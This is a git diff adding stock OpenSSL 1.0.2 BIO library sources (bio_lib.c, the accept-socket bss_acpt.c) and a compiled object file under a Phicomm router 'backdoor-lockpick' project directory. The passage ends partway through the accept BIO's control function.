+
+    i = b->method->bread(b, out, outl);
+
+    if (i > 0)
+        b->num_read += (unsigned long)i;
+
+    if (cb != NULL)
+        i = (int)cb(b, BIO_CB_READ | BIO_CB_RETURN, out, outl, 0L, (long)i);
+    return (i);
+}
+
+int BIO_write(BIO *b, const void *in, int inl)
+{
+    int i;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if (b == NULL)
+        return (0);
+
+    cb = b->callback;
+    if ((b->method == NULL) || (b->method->bwrite == NULL)) {
+        BIOerr(BIO_F_BIO_WRITE, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    if ((cb != NULL) &&
+        ((i = (int)cb(b, BIO_CB_WRITE, in, inl, 0L, 1L)) <= 0))
+        return (i);
+
+    if (!b->init) {
+        BIOerr(BIO_F_BIO_WRITE, BIO_R_UNINITIALIZED);
+        return (-2);
+    }
+
+    i = b->method->bwrite(b, in, inl);
+
+    if (i > 0)
+        b->num_write += (unsigned long)i;
+
+    if (cb != NULL)
+        i = (int)cb(b, BIO_CB_WRITE | BIO_CB_RETURN, in, inl, 0L, (long)i);
+    return (i);
+}
+
+int BIO_puts(BIO *b, const char *in)
+{
+    int i;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if ((b == NULL) || (b->method == NULL) || (b->method->bputs == NULL)) {
+        BIOerr(BIO_F_BIO_PUTS, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    cb = b->callback;
+
+    if ((cb != NULL) && ((i = (int)cb(b, BIO_CB_PUTS, in, 0, 0L, 1L)) <= 0))
+        return (i);
+
+    if (!b->init) {
+        BIOerr(BIO_F_BIO_PUTS, BIO_R_UNINITIALIZED);
+        return (-2);
+    }
+
+    i = b->method->bputs(b, in);
+
+    if (i > 0)
+        b->num_write += (unsigned long)i;
+
+    if (cb != NULL)
+        i = (int)cb(b, BIO_CB_PUTS | BIO_CB_RETURN, in, 0, 0L, (long)i);
+    return (i);
+}
+
+int BIO_gets(BIO *b, char *in, int inl)
+{
+    int i;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if ((b == NULL) || (b->method == NULL) || (b->method->bgets == NULL)) {
+        BIOerr(BIO_F_BIO_GETS, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    cb = b->callback;
+
+    if ((cb != NULL) && ((i = (int)cb(b, BIO_CB_GETS, in, inl, 0L, 1L)) <= 0))
+        return (i);
+
+    if (!b->init) {
+        BIOerr(BIO_F_BIO_GETS, BIO_R_UNINITIALIZED);
+        return (-2);
+    }
+
+    i = b->method->bgets(b, in, inl);
+
+    if (cb != NULL)
+        i = (int)cb(b, BIO_CB_GETS | BIO_CB_RETURN, in, inl, 0L, (long)i);
+    return (i);
+}
+
+int BIO_indent(BIO *b, int indent, int max)
+{
+    if (indent < 0)
+        indent = 0;
+    if (indent > max)
+        indent = max;
+    while (indent--)
+        if (BIO_puts(b, " ") != 1)
+            return 0;
+    return 1;
+}
+
+long BIO_int_ctrl(BIO *b, int cmd, long larg, int iarg)
+{
+    int i;
+
+    i = iarg;
+    return (BIO_ctrl(b, cmd, larg, (char *)&i));
+}
+
+char *BIO_ptr_ctrl(BIO *b, int cmd, long larg)
+{
+    char *p = NULL;
+
+    if (BIO_ctrl(b, cmd, larg, (char *)&p) <= 0)
+        return (NULL);
+    else
+        return (p);
+}
+
+long BIO_ctrl(BIO *b, int cmd, long larg, void *parg)
+{
+    long ret;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if (b == NULL)
+        return (0);
+
+    if ((b->method == NULL) || (b->method->ctrl == NULL)) {
+        BIOerr(BIO_F_BIO_CTRL, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    cb = b->callback;
+
+    if ((cb != NULL) &&
+        ((ret = cb(b, BIO_CB_CTRL, parg, cmd, larg, 1L)) <= 0))
+        return (ret);
+
+    ret = b->method->ctrl(b, cmd, larg, parg);
+
+    if (cb != NULL)
+        ret = cb(b, BIO_CB_CTRL | BIO_CB_RETURN, parg, cmd, larg, ret);
+    return (ret);
+}
+
+long BIO_callback_ctrl(BIO *b, int cmd,
+                       void (*fp) (struct bio_st *, int, const char *, int,
+                                   long, long))
+{
+    long ret;
+    long (*cb) (BIO *, int, const char *, int, long, long);
+
+    if (b == NULL)
+        return (0);
+
+    if ((b->method == NULL) || (b->method->callback_ctrl == NULL)) {
+        BIOerr(BIO_F_BIO_CALLBACK_CTRL, BIO_R_UNSUPPORTED_METHOD);
+        return (-2);
+    }
+
+    cb = b->callback;
+
+    if ((cb != NULL) &&
+        ((ret = cb(b, BIO_CB_CTRL, (void *)&fp, cmd, 0, 1L)) <= 0))
+        return (ret);
+
+    ret = b->method->callback_ctrl(b, cmd, fp);
+
+    if (cb != NULL)
+        ret = cb(b, BIO_CB_CTRL | BIO_CB_RETURN, (void *)&fp, cmd, 0, ret);
+    return (ret);
+}
+
+/*
+ * It is unfortunate to duplicate in functions what the BIO_(w)pending macros
+ * do; but those macros have inappropriate return type, and for interfacing
+ * from other programming languages, C macros aren't much of a help anyway.
+ */
+size_t BIO_ctrl_pending(BIO *bio)
+{
+    return BIO_ctrl(bio, BIO_CTRL_PENDING, 0, NULL);
+}
+
+size_t BIO_ctrl_wpending(BIO *bio)
+{
+    return BIO_ctrl(bio, BIO_CTRL_WPENDING, 0, NULL);
+}
+
+/* put the 'bio' on the end of b's list of operators */
+BIO *BIO_push(BIO *b, BIO *bio)
+{
+    BIO *lb;
+
+    if (b == NULL)
+        return (bio);
+    lb = b;
+    while (lb->next_bio != NULL)
+        lb = lb->next_bio;
+    lb->next_bio = bio;
+    if (bio != NULL)
+        bio->prev_bio = lb;
+    /* called to do internal processing */
+    BIO_ctrl(b, BIO_CTRL_PUSH, 0, lb);
+    return (b);
+}
+
+/* Remove the first and return the rest */
+BIO *BIO_pop(BIO *b)
+{
+    BIO *ret;
+
+    if (b == NULL)
+        return (NULL);
+    ret = b->next_bio;
+
+    BIO_ctrl(b, BIO_CTRL_POP, 0, b);
+
+    if (b->prev_bio != NULL)
+        b->prev_bio->next_bio = b->next_bio;
+    if (b->next_bio != NULL)
+        b->next_bio->prev_bio = b->prev_bio;
+
+    b->next_bio = NULL;
+    b->prev_bio = NULL;
+    return (ret);
+}
+
+BIO *BIO_get_retry_BIO(BIO *bio, int *reason)
+{
+    BIO *b, *last;
+
+    b = last = bio;
+    for (;;) {
+        if (!BIO_should_retry(b))
+            break;
+        last = b;
+        b = b->next_bio;
+        if (b == NULL)
+            break;
+    }
+    if (reason != NULL)
+        *reason = last->retry_reason;
+    return (last);
+}
+
+int BIO_get_retry_reason(BIO *bio)
+{
+    return (bio->retry_reason);
+}
+
+BIO *BIO_find_type(BIO *bio, int type)
+{
+    int mt, mask;
+
+    if (!bio)
+        return NULL;
+    mask = type & 0xff;
+    do {
+        if (bio->method != NULL) {
+            mt = bio->method->type;
+
+            if (!mask) {
+                if (mt & type)
+                    return (bio);
+            } else if (mt == type)
+                return (bio);
+        }
+        bio = bio->next_bio;
+    } while (bio != NULL);
+    return (NULL);
+}
+
+BIO *BIO_next(BIO *b)
+{
+    if (!b)
+        return NULL;
+    return b->next_bio;
+}
+
+void BIO_free_all(BIO *bio)
+{
+    BIO *b;
+    int ref;
+
+    while (bio != NULL) {
+        b = bio;
+        ref = b->references;
+        bio = bio->next_bio;
+        BIO_free(b);
+        /* Since ref count > 1, don't free anyone else. */
+        if (ref > 1)
+            break;
+    }
+}
+
+BIO *BIO_dup_chain(BIO *in)
+{
+    BIO *ret = NULL, *eoc = NULL, *bio, *new_bio;
+
+    for (bio = in; bio != NULL; bio = bio->next_bio) {
+        if ((new_bio = BIO_new(bio->method)) == NULL)
+            goto err;
+        new_bio->callback = bio->callback;
+        new_bio->cb_arg = bio->cb_arg;
+        new_bio->init = bio->init;
+        new_bio->shutdown = bio->shutdown;
+        new_bio->flags = bio->flags;
+
+        /* This will let SSL_s_sock() work with stdin/stdout */
+        new_bio->num = bio->num;
+
+        if (!BIO_dup_state(bio, (char *)new_bio)) {
+            BIO_free(new_bio);
+            goto err;
+        }
+
+        /* copy app data */
+        if (!CRYPTO_dup_ex_data(CRYPTO_EX_INDEX_BIO, &new_bio->ex_data,
+                                &bio->ex_data))
+            goto err;
+
+        if (ret == NULL) {
+            eoc = new_bio;
+            ret = eoc;
+        } else {
+            BIO_push(eoc, new_bio);
+            eoc = new_bio;
+        }
+    }
+    return (ret);
+ err:
+    if (ret != NULL)
+        BIO_free(ret);
+    return (NULL);
+}
+
+void BIO_copy_next_retry(BIO *b)
+{
+    BIO_set_flags(b, BIO_get_retry_flags(b->next_bio));
+    b->retry_reason = b->next_bio->retry_reason;
+}
+
+int BIO_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_BIO, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int BIO_set_ex_data(BIO *bio, int idx, void *data)
+{
+    return (CRYPTO_set_ex_data(&(bio->ex_data), idx, data));
+}
+
+void *BIO_get_ex_data(BIO *bio, int idx)
+{
+    return (CRYPTO_get_ex_data(&(bio->ex_data), idx));
+}
+
+unsigned long BIO_number_read(BIO *bio)
+{
+    if (bio)
+        return bio->num_read;
+    return 0;
+}
+
+unsigned long BIO_number_written(BIO *bio)
+{
+    if (bio)
+        return bio->num_write;
+    return 0;
+}
+
+IMPLEMENT_STACK_OF(BIO)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bio_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..1f49d102211a2b6a973d83572412a09c12926a9d
GIT binary patch
literal 8936
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
F{{xxfQ&j)}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_acpt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_acpt.c
new file mode 100644
index 0000000..4a5e39b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_acpt.c
@@ -0,0 +1,463 @@
+/* crypto/bio/bss_acpt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+#ifndef OPENSSL_NO_SOCK
+
+# ifdef OPENSSL_SYS_WIN16
+#  define SOCKET_PROTOCOL 0     /* more microsoft stupidity */
+# else
+#  define SOCKET_PROTOCOL IPPROTO_TCP
+# endif
+
+# if (defined(OPENSSL_SYS_VMS) && __VMS_VER < 70000000)
+/* FIONBIO used as a switch to enable ioctl, and that isn't in VMS < 7.0 */
+#  undef FIONBIO
+# endif
+
+typedef struct bio_accept_st {
+    int state;
+    char *param_addr;
+    int accept_sock;
+    int accept_nbio;
+    char *addr;
+    int nbio;
+    /*
+     * If 0, it means normal, if 1, do a connect on bind failure, and if
+     * there is no-one listening, bind with SO_REUSEADDR. If 2, always use
+     * SO_REUSEADDR.
+     */
+    int bind_mode;
+    BIO *bio_chain;
+} BIO_ACCEPT;
+
+static int acpt_write(BIO *h, const char *buf, int num);
+static int acpt_read(BIO *h, char *buf, int size);
+static int acpt_puts(BIO *h, const char *str);
+static long acpt_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int acpt_new(BIO *h);
+static int acpt_free(BIO *data);
+static int acpt_state(BIO *b, BIO_ACCEPT *c);
+static void acpt_close_socket(BIO *data);
+static BIO_ACCEPT *BIO_ACCEPT_new(void);
+static void BIO_ACCEPT_free(BIO_ACCEPT *a);
+
+# define ACPT_S_BEFORE                   1
+# define ACPT_S_GET_ACCEPT_SOCKET        2
+# define ACPT_S_OK                       3
+
+static BIO_METHOD methods_acceptp = {
+    BIO_TYPE_ACCEPT,
+    "socket accept",
+    acpt_write,
+    acpt_read,
+    acpt_puts,
+    NULL,                       /* connect_gets, */
+    acpt_ctrl,
+    acpt_new,
+    acpt_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_accept(void)
+{
+    return (&methods_acceptp);
+}
+
+static int acpt_new(BIO *bi)
+{
+    BIO_ACCEPT *ba;
+
+    bi->init = 0;
+    bi->num = INVALID_SOCKET;
+    bi->flags = 0;
+    if ((ba = BIO_ACCEPT_new()) == NULL)
+        return (0);
+    bi->ptr = (char *)ba;
+    ba->state = ACPT_S_BEFORE;
+    bi->shutdown = 1;
+    return (1);
+}
+
+static BIO_ACCEPT *BIO_ACCEPT_new(void)
+{
+    BIO_ACCEPT *ret;
+
+    if ((ret = (BIO_ACCEPT *)OPENSSL_malloc(sizeof(BIO_ACCEPT))) == NULL)
+        return (NULL);
+
+    memset(ret, 0, sizeof(BIO_ACCEPT));
+    ret->accept_sock = INVALID_SOCKET;
+    ret->bind_mode = BIO_BIND_NORMAL;
+    return (ret);
+}
+
+static void BIO_ACCEPT_free(BIO_ACCEPT *a)
+{
+    if (a == NULL)
+        return;
+
+    if (a->param_addr != NULL)
+        OPENSSL_free(a->param_addr);
+    if (a->addr != NULL)
+        OPENSSL_free(a->addr);
+    if (a->bio_chain != NULL)
+        BIO_free(a->bio_chain);
+    OPENSSL_free(a);
+}
+
+static void acpt_close_socket(BIO *bio)
+{
+    BIO_ACCEPT *c;
+
+    c = (BIO_ACCEPT *)bio->ptr;
+    if (c->accept_sock != INVALID_SOCKET) {
+        shutdown(c->accept_sock, 2);
+        closesocket(c->accept_sock);
+        c->accept_sock = INVALID_SOCKET;
+        bio->num = INVALID_SOCKET;
+    }
+}
+
+static int acpt_free(BIO *a)
+{
+    BIO_ACCEPT *data;
+
+    if (a == NULL)
+        return (0);
+    data = (BIO_ACCEPT *)a->ptr;
+
+    if (a->shutdown) {
+        acpt_close_socket(a);
+        BIO_ACCEPT_free(data);
+        a->ptr = NULL;
+        a->flags = 0;
+        a->init = 0;
+    }
+    return (1);
+}
+
+static int acpt_state(BIO *b, BIO_ACCEPT *c)
+{
+    BIO *bio = NULL, *dbio;
+    int s = -1;
+    int i;
+
+ again:
+    switch (c->state) {
+    case ACPT_S_BEFORE:
+        if (c->param_addr == NULL) {
+            BIOerr(BIO_F_ACPT_STATE, BIO_R_NO_ACCEPT_PORT_SPECIFIED);
+            return (-1);
+        }
+        s = BIO_get_accept_socket(c->param_addr, c->bind_mode);
+        if (s == INVALID_SOCKET)
+            return (-1);
+
+        if (c->accept_nbio) {
+            if (!BIO_socket_nbio(s, 1)) {
+                closesocket(s);
+                BIOerr(BIO_F_ACPT_STATE,
+                       BIO_R_ERROR_SETTING_NBIO_ON_ACCEPT_SOCKET);
+                return (-1);
+            }
+        }
+        c->accept_sock = s;
+        b->num = s;
+        c->state = ACPT_S_GET_ACCEPT_SOCKET;
+        return (1);
+        /* break; */
+    case ACPT_S_GET_ACCEPT_SOCKET:
+        if (b->next_bio != NULL) {
+            c->state = ACPT_S_OK;
+            goto again;
+        }
+        BIO_clear_retry_flags(b);
+        b->retry_reason = 0;
+        i = BIO_accept(c->accept_sock, &(c->addr));
+
+        /* -2 return means we should retry */
+        if (i == -2) {
+            BIO_set_retry_special(b);
+            b->retry_reason = BIO_RR_ACCEPT;
+            return -1;
+        }
+
+        if (i < 0)
+            return (i);
+
+        bio = BIO_new_socket(i, BIO_CLOSE);
+        if (bio == NULL)
+            goto err;
+
+        BIO_set_callback(bio, BIO_get_callback(b));
+        BIO_set_callback_arg(bio, BIO_get_callback_arg(b));
+
+        if (c->nbio) {
+            if (!BIO_socket_nbio(i, 1)) {
+                BIOerr(BIO_F_ACPT_STATE,
+                       BIO_R_ERROR_SETTING_NBIO_ON_ACCEPTED_SOCKET);
+                goto err;
+            }
+        }
+
+        /*
+         * If the accept BIO has an bio_chain, we dup it and put the new
+         * socket at the end.
+         */
+        if (c->bio_chain != NULL) {
+            if ((dbio = BIO_dup_chain(c->bio_chain)) == NULL)
+                goto err;
+            if (!BIO_push(dbio, bio))
+                goto err;
+            bio = dbio;
+        }
+        if (BIO_push(b, bio) == NULL)
+            goto err;
+
+        c->state = ACPT_S_OK;
+        return (1);
+ err:
+        if (bio != NULL)
+            BIO_free(bio);
+        else if (s >= 0)
+            closesocket(s);
+        return (0);
+        /* break; */
+    case ACPT_S_OK:
+        if (b->next_bio == NULL) {
+            c->state = ACPT_S_GET_ACCEPT_SOCKET;
+            goto again;
+        }
+        return (1);
+        /* break; */
+    default:
+        return (0);
+        /* break; */
+    }
+
+}
+
+static int acpt_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+    BIO_ACCEPT *data;
+
+    BIO_clear_retry_flags(b);
+    data = (BIO_ACCEPT *)b->ptr;
+
+    while (b->next_bio == NULL) {
+        ret = acpt_state(b, data);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    ret = BIO_read(b->next_bio, out, outl);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static int acpt_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+    BIO_ACCEPT *data;
+
+    BIO_clear_retry_flags(b);
+    data = (BIO_ACCEPT *)b->ptr;
+
+    while (b->next_bio == NULL) {
+        ret = acpt_state(b, data);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    ret = BIO_write(b->next_bio, in, inl);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static long acpt_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    int *ip;
+    long ret = 1;
+    BIO_ACCEPT *data;
+    char **pp;
+
+    data = (BIO_ACCEPT *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ret = 0;
+        data->state = ACPT_S_BEFORE;
+        acpt_close_socket(b);
+        b->flags = 0;
+        break;
+    case BIO_C_DO_STATE_MACHINE:
